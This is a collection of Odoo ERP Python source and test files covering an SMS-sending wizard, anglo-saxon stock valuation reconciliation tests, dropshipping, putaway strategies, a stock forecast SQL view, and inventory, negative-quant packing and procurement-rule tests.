_logger = logging.getLogger(__name__)
try:
import phonenumbers
_sms_phonenumbers_lib_imported = True
except ImportError:
_sms_phonenumbers_lib_imported = False
_logger.info(
"The `phonenumbers` Python module is not available. "
"Phone number validation will be skipped. "
"Try `pip3 install phonenumbers` to install it."
)
class SendSMS(models.TransientModel):
_name = 'sms.send_sms'
_description = 'Send SMS'
recipients = fields.Char('Recipients', required=True)
message = fields.Text('Message', required=True)
def _phone_get_country(self, partner):
if 'country_id' in partner:
return partner.country_id
return self.env.user.company_id.country_id
def _sms_sanitization(self, partner, field_name):
number = partner[field_name]
if number and _sms_phonenumbers_lib_imported:
country = self._phone_get_country(partner)
country_code = country.code if country else None
try:
phone_nbr = phonenumbers.parse(number, region=country_code, keep_raw_input=True)
except phonenumbers.phonenumberutil.NumberParseException:
return number
if not phonenumbers.is_possible_number(phone_nbr) or not phonenumbers.is_valid_number(phone_nbr):
return number
phone_fmt = phonenumbers.PhoneNumberFormat.E164
return phonenumbers.format_number(phone_nbr, phone_fmt)
else:
return number
def _get_records(self, model):
if self.env.context.get('active_domain'):
records = model.search(self.env.context.get('active_domain'))
elif self.env.context.get('active_ids'):
records = model.browse(self.env.context.get('active_ids', []))
else:
records = model.browse(self.env.context.get('active_id', []))
return records
@api.model
def default_get(self, fields):
result = super(SendSMS, self).default_get(fields)
active_model = self.env.context.get('active_model')
if not self.env.context.get('default_recipients') and active_model and hasattr(self.env[active_model], '_get_default_sms_recipients'):
model = self.env[active_model]
records = self._get_records(model)
partners = records._get_default_sms_recipients()
phone_numbers = []
no_phone_partners = []
for partner in partners:
number = self._sms_sanitization(partner, self.env.context.get('field_name') or 'mobile')
if number:
phone_numbers.append(number)
else:
no_phone_partners.append(partner.name)
if len(partners) > 1:
if no_phone_partners:
raise UserError(_('Missing mobile number for %s.') % ', '.join(no_phone_partners))
result['recipients'] = ', '.join(phone_numbers)
return result
def action_send_sms(self):
numbers = [number.strip() for number in self.recipients.split(',') if number.strip()]
active_model = self.env.context.get('active_model')
if active_model and hasattr(self.env[active_model], 'message_post_send_sms'):
model = self.env[active_model]
records = self._get_records(model)
records.message_post_send_sms(self.message, numbers=numbers)
else:
self.env['sms.api']._send_sms(numbers, self.message)
return True
```
#### File: stock_account/tests/test_anglo_saxon_valuation_reconciliation_common.py
```python
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo import fields
class ValuationReconciliationTestCase(AccountingTestCase):
""" Base class for tests checking interim accounts reconciliation works
in anglosaxon accounting. It sets up everything we need in the tests, and is
extended in both sale_stock and purchase modules to run the 'true' tests.
"""
def check_reconciliation(self, invoice, picking, full_reconcile=True, operation='purchase'):
interim_account_id = operation == 'purchase' and self.input_account.id or self.output_account.id
invoice_line = self.env['account.move.line'].search([('move_id','=', invoice.move_id.id), ('account_id', '=', interim_account_id)])
valuation_line = picking.move_lines.mapped('account_move_ids.line_ids').filtered(lambda x: x.account_id.id == interim_account_id)
self.assertEqual(len(invoice_line), 1, "Only one line should have been written by invoice in stock input account")
self.assertEqual(len(valuation_line), 1, "Only one line should have been written for stock valuation in stock input account")
self.assertTrue(valuation_line.reconciled or invoice_line.reconciled, "The valuation and invoice line should have been reconciled together.")
if full_reconcile:
self.assertTrue(valuation_line.full_reconcile_id, "The reconciliation should be total at that point.")
else:
self.assertFalse(valuation_line.full_reconcile_id, "The reconciliation should not be total at that point.")
def _process_pickings(self, pickings, date=False, quantity=False):
if not date:
date = fields.Date.today()
pickings.action_confirm()
pickings.action_assign()
for picking in pickings:
for ml in picking.move_line_ids:
ml.qty_done = quantity or ml.product_qty
pickings.action_done()
self._change_pickings_date(pickings, date)
def _change_pickings_date(self, pickings, date):
pickings.mapped('move_lines').write({'date': date})
pickings.mapped('move_lines.account_move_ids').write({'date': date})
def _create_product_category(self):
return self.env['product.category'].create({
'name': 'Test category',
'property_valuation': 'real_time',
'property_cost_method': 'fifo',
'property_stock_valuation_account_id': self.valuation_account.id,
'property_stock_account_input_categ_id': self.input_account.id,
'property_stock_account_output_categ_id': self.output_account.id,
})
def setUp(self):
super(ValuationReconciliationTestCase, self).setUp()
self.company = self.env['res.company']._company_default_get()
self.company.anglo_saxon_accounting = True
self.currency_one = self.company.currency_id
currency_two_name = 'USD' if self.currency_one.name != 'USD' else 'EUR'
self.currency_two = self.env['res.currency'].search([('name', '=', currency_two_name)])
self.input_account = self.env['account.account'].create({
'name': 'Test stock in',
'code': 'stock_account_TEST_42',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.output_account = self.env['account.account'].create({
'name': 'Test stock out',
'code': 'stock_account_TEST_43',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.valuation_account = self.env['account.account'].create({
'name': 'Test stock valuation',
'code': 'stock_account_TEST_44',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.test_product_category = self._create_product_category()
uom = self.env['uom.uom'].search([], limit=1)
test_product_delivery_inv_template = self.env['product.template'].create({
'name': 'Test product template invoiced on delivery',
'type': 'product',
'categ_id': self.test_product_category.id,
'uom_id': uom.id,
'uom_po_id': uom.id,
})
test_product_order_inv_template = self.env['product.template'].create({
'name': 'Test product template invoiced on order',
'type': 'product',
'categ_id': self.test_product_category.id,
'uom_id': uom.id,
'uom_po_id': uom.id,
})
self.test_product_order = self.env['product.product'].create({
'name': 'The chocolate moose - order',
'product_tmpl_id': test_product_order_inv_template.id,
'standard_price': 42.0,
})
self.test_product_delivery = self.env['product.product'].create({
'name': 'The chocolate moose - delivery',
'product_tmpl_id': test_product_delivery_inv_template.id,
'standard_price': 42.0,
})
self.test_partner = self.env['res.partner'].create({
'name': '<NAME>',
'supplier': True,
'customer': True,
})
self.product_price_unit = 66.0
# We delete the currency rate defined in demo data for USD on June 6th.
# This is mandatory to ensure consistency of the data generated by the test,
# as stock pickings created from a PO are by design always created for
# the current date (there is no way forcing this), meaning that they
# always use today's exchange rate for their valuation.
# Despite the fact we rewrite the date of the valuation moves artificially,
# we cannot correct the debit and credit values, since the anglosaxon
# entries get automatically reconciled (and you cannot modify a reconciled entry).
# So, we have to make sure that "today"'s rate will always be the last rate we
# created in order to ensure complete control of the test.
self.env.ref('base.rateUSDbis').unlink()
```
#### File: stock_dropshipping/models/sale.py
```python
from odoo import api, models, fields
class SaleOrderLine(models.Model):
_inherit = "sale.order.line"
purchase_line_ids = fields.One2many('purchase.order.line', 'sale_line_id')
@api.multi
def _get_qty_procurement(self):
# People without purchase rights should be able to do this operation
purchase_lines_sudo = self.sudo().purchase_line_ids
if purchase_lines_sudo.filtered(lambda r: r.state != 'cancel'):
qty = 0.0
for po_line in purchase_lines_sudo.filtered(lambda r: r.state != 'cancel'):
qty += po_line.product_uom._compute_quantity(po_line.product_qty, self.product_uom, rounding_method='HALF-UP')
return qty
else:
return super(SaleOrderLine, self)._get_qty_procurement()
```
#### File: stock/models/product_strategy.py
```python
from odoo import fields, models, api
class RemovalStrategy(models.Model):
_name = 'product.removal'
_description = 'Removal Strategy'
name = fields.Char('Name', required=True)
method = fields.Char("Method", required=True, help="FIFO, LIFO...")
class PutAwayStrategy(models.Model):
_name = 'product.putaway'
_description = 'Put Away Strategy'
name = fields.Char('Name', required=True)
fixed_location_ids = fields.One2many(
'stock.fixed.putaway.strat', 'putaway_id',
'Fixed Locations Per Product Category', domain=[('category_id', '!=', False)], copy=True)
product_location_ids = fields.One2many(
'stock.fixed.putaway.strat', 'putaway_id',
'Fixed Locations Per Product', domain=[('product_id', '!=', False)], copy=True)
def putaway_apply(self, product):
put_away = self._get_putaway_rule(product)
if put_away:
return put_away.fixed_location_id
return self.env['stock.location']
def _get_putaway_rule(self, product):
if self.product_location_ids:
put_away = self.product_location_ids.filtered(lambda x: x.product_id == product)
if put_away:
return put_away[0]
if self.fixed_location_ids:
categ = product.categ_id
while categ:
put_away = self.fixed_location_ids.filtered(lambda x: x.category_id == categ)
if put_away:
return put_away[0]
categ = categ.parent_id
return self.env['stock.location']
class FixedPutAwayStrategy(models.Model):
_name = 'stock.fixed.putaway.strat'
_order = 'sequence'
_description = 'Fixed Putaway Strategy on Location'
product_id = fields.Many2one('product.product', 'Product')
putaway_id = fields.Many2one('product.putaway', 'Put Away Method', required=True)
category_id = fields.Many2one('product.category', 'Product Category')
fixed_location_id = fields.Many2one('stock.location', 'Location', required=True)
sequence = fields.Integer('Priority', help="Give to the more specialized category, a higher priority to have them in top of the list.")
```
#### File: stock/report/report_stock_forecast.py
```python
from odoo import api, fields, models, tools
class ReportStockForecat(models.Model):
_name = 'report.stock.forecast'
_auto = False
_description = 'Stock Forecast Report'
date = fields.Date(string='Date')
product_id = fields.Many2one('product.product', string='Product', readonly=True)
product_tmpl_id = fields.Many2one('product.template', string='Product Template', related='product_id.product_tmpl_id', readonly=True)
cumulative_quantity = fields.Float(string='Cumulative Quantity', readonly=True)
quantity = fields.Float(readonly=True)
company_id = fields.Many2one('res.company', string='Company', readonly=True)
@api.model_cr
def init(self):
tools.drop_view_if_exists(self._cr, 'report_stock_forecast')
self._cr.execute("""CREATE or REPLACE VIEW report_stock_forecast AS (SELECT
MIN(id) as id,
product_id as product_id,
date as date,
sum(product_qty) AS quantity,
sum(sum(product_qty)) OVER (PARTITION BY product_id ORDER BY date) AS cumulative_quantity,
company_id
FROM
(SELECT
MIN(id) as id,
MAIN.product_id as product_id,
SUB.date as date,
CASE WHEN MAIN.date = SUB.date THEN sum(MAIN.product_qty) ELSE 0 END as product_qty,
MAIN.company_id as company_id
FROM
(SELECT
MIN(sq.id) as id,
sq.product_id,
date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) as date,
SUM(sq.quantity) AS product_qty,
sq.company_id
FROM
stock_quant as sq
LEFT JOIN
product_product ON product_product.id = sq.product_id
LEFT JOIN
stock_location location_id ON sq.location_id = location_id.id
WHERE
location_id.usage = 'internal'
GROUP BY date, sq.product_id, sq.company_id
UNION ALL
SELECT
MIN(-sm.id) as id,
sm.product_id,
CASE WHEN sm.date_expected > CURRENT_DATE
THEN date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD'))
ELSE date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) END
AS date,
SUM(sm.product_qty) AS product_qty,
sm.company_id
FROM
stock_move as sm
LEFT JOIN
product_product ON product_product.id = sm.product_id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
WHERE
sm.state IN ('confirmed','partially_available','assigned','waiting') and
source_location.usage != 'internal' and dest_location.usage = 'internal'
GROUP BY sm.date_expected,sm.product_id, sm.company_id
UNION ALL
SELECT
MIN(-sm.id) as id,
sm.product_id,
CASE WHEN sm.date_expected > CURRENT_DATE
THEN date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD'))
ELSE date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) END
AS date,
SUM(-(sm.product_qty)) AS product_qty,
sm.company_id
FROM
stock_move as sm
LEFT JOIN
product_product ON product_product.id = sm.product_id
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
WHERE
sm.state IN ('confirmed','partially_available','assigned','waiting') and
source_location.usage = 'internal' and dest_location.usage != 'internal'
GROUP BY sm.date_expected,sm.product_id, sm.company_id)
as MAIN
LEFT JOIN
(SELECT DISTINCT date
FROM
(
SELECT date_trunc('week', CURRENT_DATE) AS DATE
UNION ALL
SELECT date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD')) AS date
FROM stock_move sm
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
WHERE
sm.state IN ('confirmed','assigned','waiting') and sm.date_expected > CURRENT_DATE and
((dest_location.usage = 'internal' AND source_location.usage != 'internal')
or (source_location.usage = 'internal' AND dest_location.usage != 'internal'))) AS DATE_SEARCH)
SUB ON (SUB.date IS NOT NULL)
GROUP BY MAIN.product_id,SUB.date, MAIN.date, MAIN.company_id
) AS FINAL
GROUP BY product_id,date,company_id)""")
```
#### File: stock/tests/test_inventory.py
```python
from odoo.exceptions import ValidationError
from odoo.tests.common import TransactionCase
class TestInventory(TransactionCase):
def setUp(self):
super(TestInventory, self).setUp()
self.stock_location = self.env.ref('stock.stock_location_stock')
self.pack_location = self.env.ref('stock.location_pack_zone')
self.pack_location.active = True
self.customer_location = self.env.ref('stock.stock_location_customers')
self.uom_unit = self.env.ref('uom.product_uom_unit')
self.product1 = self.env['product.product'].create({
'name': 'Product A',
'type': 'product',
'categ_id': self.env.ref('product.product_category_all').id,
})
self.product2 = self.env['product.product'].create({
'name': 'Product A',
'type': 'product',
'tracking': 'serial',
'categ_id': self.env.ref('product.product_category_all').id,
})
def test_inventory_1(self):
""" Check that making an inventory adjustment to remove all products from stock is working
as expected.
"""
# make some stock
self.env['stock.quant']._update_available_quantity(self.product1, self.stock_location, 100)
self.assertEqual(len(self.env['stock.quant']._gather(self.product1, self.stock_location)), 1.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 100.0)
# remove them with an inventory adjustment
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 100)
inventory.line_ids.product_qty = 0 # Put the quantity back to 0
inventory.action_validate()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 0.0)
self.assertEqual(sum(self.env['stock.quant']._gather(self.product1, self.stock_location).mapped('quantity')), 0.0)
def test_inventory_2(self):
""" Check that adding a tracked product through an inventory adjustment work as expected.
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 1
inventory.action_validate()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, lot_id=lot1), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, lot_id=lot1)), 1.0)
self.assertEqual(lot1.product_qty, 1.0)
def test_inventory_3(self):
""" Check that it's not posisble to have multiple products with a serial number through an
inventory adjustment
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 2
with self.assertRaises(ValidationError):
inventory.action_validate()
def test_inventory_4(self):
""" Check that even if a product is tracked by serial number, it's possible to add
untracked one in an inventory adjustment.
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 1
self.env['stock.inventory.line'].create({
'inventory_id': inventory.id,
'product_id': self.product2.id,
'product_uom_id': self.uom_unit.id,
'product_qty': 10,
'location_id': self.stock_location.id,
})
res_dict_for_warning_lot = inventory.action_validate()
wizard_warning_lot = self.env[(res_dict_for_warning_lot.get('res_model'))].browse(res_dict_for_warning_lot.get('res_id'))
wizard_warning_lot.action_confirm()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, lot_id=lot1, strict=True), 1.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, strict=True), 10.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location), 11.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, lot_id=lot1, strict=True)), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, strict=True)), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location)), 2.0)
def test_inventory_5(self):
""" Check that assigning an owner does work.
"""
owner1 = self.env['res.partner'].create({'name': 'test_inventory_5'})
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
'exhausted': True,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
inventory.line_ids.partner_id = owner1
inventory.line_ids.product_qty = 5
inventory.action_validate()
quant = self.env['stock.quant']._gather(self.product1, self.stock_location)
self.assertEqual(len(quant), 1)
self.assertEqual(quant.quantity, 5)
self.assertEqual(quant.owner_id.id, owner1.id)
def test_inventory_6(self):
""" Test that for chained moves, making an inventory adjustment to reduce a quantity that
has been reserved correctly free the reservation. After that, add products in stock and check
that they're used if the user encodes more than what's available through the chain
"""
# add 10 products in stock
inventory = self.env['stock.inventory'].create({
'name': 'add 10 products 1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
inventory.line_ids.product_qty = 10
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 10.0)
# Make a chain of two moves, validate the first and check that 10 products are reserved
# in the second one.
move_stock_pack = self.env['stock.move'].create({
'name': 'test_link_2_1',
'location_id': self.stock_location.id,
'location_dest_id': self.pack_location.id,
'product_id': self.product1.id,
'product_uom': self.uom_unit.id,
'product_uom_qty': 10.0,
})
move_pack_cust = self.env['stock.move'].create({
'name': 'test_link_2_2',
'location_id': self.pack_location.id,
'location_dest_id': self.customer_location.id,
'product_id': self.product1.id,
'product_uom': self.uom_unit.id,
'product_uom_qty': 10.0,
})
move_stock_pack.write({'move_dest_ids': [(4, move_pack_cust.id, 0)]})
move_pack_cust.write({'move_orig_ids': [(4, move_stock_pack.id, 0)]})
(move_stock_pack + move_pack_cust)._action_confirm()
move_stock_pack._action_assign()
self.assertEqual(move_stock_pack.state, 'assigned')
move_stock_pack.move_line_ids.qty_done = 10
move_stock_pack._action_done()
self.assertEqual(move_stock_pack.state, 'done')
self.assertEqual(move_pack_cust.state, 'assigned')
self.assertEqual(self.env['stock.quant']._gather(self.product1, self.pack_location).quantity, 10.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0.0)
# Make and inventory adjustment and remove two products from the pack location. This should
# free the reservation of the second move.
inventory = self.env['stock.inventory'].create({
'name': 'remove 2 products 1',
'filter': 'product',
'location_id': self.pack_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
inventory.line_ids.product_qty = 8
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._gather(self.product1, self.pack_location).quantity, 8.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0)
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# If the user tries to assign again, only 8 products are available and thus the reservation
# state should not change.
move_pack_cust._action_assign()
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# Make a new inventory adjustment and bring two now products.
inventory = self.env['stock.inventory'].create({
'name': 'remove 2 products 1',
'filter': 'product',
'location_id': self.pack_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
inventory.line_ids.product_qty = 10
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 2)
# Nothing should have changed for our pack move
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# Running _action_assign will now find the new available quantity. Indeed, as the products
# are not discernabl (not lot/pack/owner), even if the new available quantity is not directly
# brought by the chain, the system fill take them into account.
move_pack_cust._action_assign()
self.assertEqual(move_pack_cust.state, 'assigned')
# move all the things
move_pack_cust.move_line_ids.qty_done = 10
move_stock_pack._action_done()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0)
def test_inventory_7(self):
""" Check that duplicated quants create a single inventory line.
"""
owner1 = self.env['res.partner'].create({'name': 'test_inventory_7'})
vals = {
'product_id': self.product1.id,
'product_uom_id': self.uom_unit.id,
'owner_id': owner1.id,
'location_id': self.stock_location.id,
'quantity': 1,
'reserved_quantity': 0,
}
self.env['stock.quant'].create(vals)
self.env['stock.quant'].create(vals)
self.assertEqual(len(self.env['stock.quant']._gather(self.product1, self.stock_location)), 2.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 2.0)
inventory = self.env['stock.inventory'].create({
'name': 'product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 2)
```
#### File: stock/tests/test_packing_neg.py
```python
from odoo.tests.common import TransactionCase
class TestPackingNeg(TransactionCase):
def test_packing_neg(self):
# Create a new "negative" storable product
product_neg = self.env['product.product'].create({
'name': 'Negative product',
'type': 'product',
'categ_id': self.ref('product.product_category_1'),
'list_price': 100.0,
'standard_price': 70.0,
'seller_ids': [(0, 0, {
'delay': 1,
'name': self.ref('base.res_partner_2'),
'min_qty': 2.0,})],
'uom_id': self.ref('uom.product_uom_unit'),
'uom_po_id': self.ref('uom.product_uom_unit'),
})
# Create an incoming picking for this product of 300 PCE from suppliers to stock
vals = {
'name': 'Incoming picking (negative product)',
'partner_id': self.ref('base.res_partner_2'),
'picking_type_id': self.ref('stock.picking_type_in'),
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 300.00,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
})],
}
pick_neg = self.env['stock.picking'].create(vals)
pick_neg.onchange_picking_type()
pick_neg.move_lines.onchange_product_id()
# Confirm and assign picking
pick_neg.action_confirm()
pick_neg.action_assign()
# Put 120 pieces on Palneg 1 (package), 120 pieces on Palneg 2 with lot A and 60 pieces on Palneg 3
# create lot A
lot_a = self.env['stock.production.lot'].create({'name': 'Lot neg', 'product_id': product_neg.id})
# create package
package1 = self.env['stock.quant.package'].create({'name': 'Palneg 1'})
package2 = self.env['stock.quant.package'].create({'name': 'Palneg 2'})
package3 = self.env['stock.quant.package'].create({'name': 'Palneg 3'})
# Create package for each line and assign it as result_package_id
# create pack operation
pick_neg.move_line_ids[0].write({'result_package_id': package1.id, 'qty_done': 120})
new_pack1 = self.env['stock.move.line'].create({
'product_id': product_neg.id,
'product_uom_id': self.ref('uom.product_uom_unit'),
'picking_id': pick_neg.id,
'lot_id': lot_a.id,
'qty_done': 120,
'result_package_id': package2.id,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock')
})
new_pack2 = self.env['stock.move.line'].create({
'product_id': product_neg.id,
'product_uom_id': self.ref('uom.product_uom_unit'),
'picking_id': pick_neg.id,
'result_package_id': package3.id,
'qty_done': 60,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock')
})
# Transfer the receipt
pick_neg.action_done()
# Make a delivery order of 300 pieces to the customer
vals = {
'name': 'outgoing picking (negative product)',
'partner_id': self.ref('base.res_partner_4'),
'picking_type_id': self.ref('stock.picking_type_out'),
'location_id': self.ref('stock.stock_location_stock'),
'location_dest_id': self.ref('stock.stock_location_customers'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 300.00,
'location_id': self.ref('stock.stock_location_stock'),
'location_dest_id': self.ref('stock.stock_location_customers'),
})],
}
delivery_order_neg = self.env['stock.picking'].create(vals)
delivery_order_neg.onchange_picking_type()
delivery_order_neg.move_lines.onchange_product_id()
# Assign and confirm
delivery_order_neg.action_confirm()
delivery_order_neg.action_assign()
# Instead of doing the 300 pieces, you decide to take pallet 1 (do not mention
# product in operation here) and 140 pieces from lot A/pallet 2 and 10 pieces from pallet 3
for rec in delivery_order_neg.move_line_ids:
if rec.package_id.name == 'Palneg 1':
rec.qty_done = rec.product_qty
rec.result_package_id = False
elif rec.package_id.name == 'Palneg 2' and rec.lot_id.name == 'Lot neg':
rec.write({
'qty_done': 140,
'result_package_id': False,
})
elif rec.package_id.name == 'Palneg 3':
rec.qty_done = 10
rec.result_package_id = False
# Process this picking
delivery_order_neg.action_done()
# Check the quants that you have -20 pieces pallet 2 in stock, and a total quantity
# of 50 in stock from pallet 3 (should be 20+30, as it has been split by reservation)
records = self.env['stock.quant'].search([('product_id', '=', product_neg.id), ('quantity', '!=', '0')])
pallet_3_stock_qty = 0
for rec in records:
if rec.package_id.name == 'Palneg 2' and rec.location_id.id == self.ref('stock.stock_location_stock'):
self.assertTrue(rec.quantity == -20, "Should have -20 pieces in stock on pallet 2. Got " + str(rec.quantity))
self.assertTrue(rec.lot_id.name == 'Lot neg', "It should have kept its Lot")
elif rec.package_id.name == 'Palneg 3' and rec.location_id.id == self.ref('stock.stock_location_stock'):
pallet_3_stock_qty += rec.quantity
else:
self.assertTrue(rec.location_id.id != self.ref('stock.stock_location_stock'), "Unrecognized quant in stock")
self.assertEqual(pallet_3_stock_qty, 50, "Should have 50 pieces in stock on pallet 3")
# Create a picking for reconciling the negative quant
vals = {
'name': 'reconciling_delivery',
'partner_id': self.ref('base.res_partner_4'),
'picking_type_id': self.ref('stock.picking_type_in'),
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 20.0,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
})],
}
delivery_reconcile = self.env['stock.picking'].create(vals)
delivery_reconcile.onchange_picking_type()
delivery_reconcile.move_lines.onchange_product_id()
# Receive 20 products with lot neg in stock with a new incoming shipment that should be on pallet 2
delivery_reconcile.action_confirm()
lot = self.env["stock.production.lot"].search([
('product_id', '=', product_neg.id),
('name', '=', 'Lot neg')], limit=1)
pack = self.env["stock.quant.package"].search([('name', '=', 'Palneg 2')], limit=1)
delivery_reconcile.move_line_ids[0].write({'lot_id': lot.id, 'qty_done': 20.0, 'result_package_id': pack.id})
delivery_reconcile.action_done()
# Check the negative quant was reconciled
neg_quants = self.env['stock.quant'].search([
('product_id', '=', product_neg.id),
('quantity', '<', 0),
('location_id.id', '!=', self.ref('stock.stock_location_suppliers'))])
self.assertTrue(len(neg_quants) == 0, "Negative quants should have been reconciled")
```
#### File: stock/tests/test_proc_rule.py
```python
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
class TestProcRule(TransactionCase):
def test_proc_rule(self):
# Create a product route containing a stock rule that will
# generate a move from Stock for every procurement created in Output
product_route = self.env['stock.location.route'].create({
'name': 'Stock -> output route',
'product_selectable': True,
'rule_ids': [(0, 0, {
'name': 'Stock -> output rule',
'action': 'pull',
'picking_type_id': self.ref('stock.picking_type_internal'),
'location_src_id': self.ref('stock.stock_location_stock'),
'location_id': self.ref('stock.stock_location_output'),
})],
})
# Set this route on `product.product_product_3`
self.env.ref('product.product_product_3').write({
'route_ids': [(4, product_route.id)]})
# Create Delivery Order of 10 `product.product_product_3` from Output -> Customer
product = self.env.ref('product.product_product_3')
vals = {
'name': 'Delivery order for procurement',
'partner_id': self.ref('base.res_partner_2'),
'picking_type_id': self.ref('stock.picking_type_out'),
'location_id': self.ref('stock.stock_location_output'),
'location_dest_id': self.ref('stock.stock_location_customers'),
'move_lines': [(0, 0, {
'name': '/',
'product_id': product.id,
'product_uom': product.uom_id.id,
'product_uom_qty': 10.00,
'procure_method': 'make_to_order',
})],
}
pick_output = self.env['stock.picking'].create(vals)
pick_output.move_lines.onchange_product_id()
# Confirm delivery order.
pick_output.action_confirm()
# I run the scheduler.
# Note: If purchase if already installed, the method _run_buy will be called due
# to the purchase demo data. As we update the stock module to run this test, the
# method won't be an attribute of stock.procurement at this moment. For that reason
# we mute the logger when running the scheduler.
with mute_logger('odoo.addons.stock.models.procurement'):
self.env['procurement.group'].run_scheduler()
# Check that a picking was created from stock to output.
moves = self.env['stock.move'].search([
('product_id', '=', self.ref('product.product_product_3')),
('location_id', '=', self.ref('stock.stock_location_stock')),
('location_dest_id', '=', self.ref('stock.stock_location_output')),
('move_dest_ids', 'in', [pick_output.move_lines[0].id])
])
self.assertEqual(len(moves.ids), 1, "It should have created a picking from Stock to Output with the original picking as destination")
```
